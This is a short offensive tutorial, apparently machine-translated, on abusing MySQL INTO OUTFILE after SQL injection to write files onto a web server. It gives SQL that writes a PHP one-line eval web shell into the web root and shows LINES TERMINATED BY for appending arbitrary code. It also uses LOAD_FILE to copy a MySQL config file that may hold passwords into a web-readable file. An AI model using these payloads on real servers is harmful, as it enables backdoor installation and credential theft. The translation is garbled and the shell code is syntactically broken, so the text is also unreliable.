In the injection process, if there is an injection point, you can directly import a sentence or upload a page. In the process, we mainly use the into outfile function to upload. Here are two ways to use the into outfile.
The first is to import the select content directly into a file:
Select version () into outfile "c:\\phpnow\\htdocs\\test.php"
Replace version () here with a sentence,<?php @eval ($_post["Mima")?>
Select <?php @eval ($_post["Mima")?> into outfile "c:\\phpnow\\htdocs\\test.php"
Directly connect a word on it, in fact, in the select content can not only upload a word, you can also upload a lot of content.
End of the second modification file:
into outfile ' c:\\phpnow\\htdocs\\test.php ' LINES TERMINATED by 0x16 file
Explanation: Usually ends with '\ r \ n', where we modify any file we want.
The binary can be a sentence or any other code that can be constructed on its own. In sqlmap Os-shell Take this way, you can refer to an article previously written Os-shell parsing.
Ps: (1) may be in the file path to pay attention to escape, this depends on the specific environment
(2)Select Load_file (' C:\\wamp\\bin\\mysql\\mysql5.6.17\\my.ini ') into outfile ' C:\\wamp \\www\\test.php ' can use this statement to export the contents of the server, the above my.ini there are password items (but the default is commented), Of course there will be a lot of content can be exported, this depends on their understanding.
SQL injection file import common means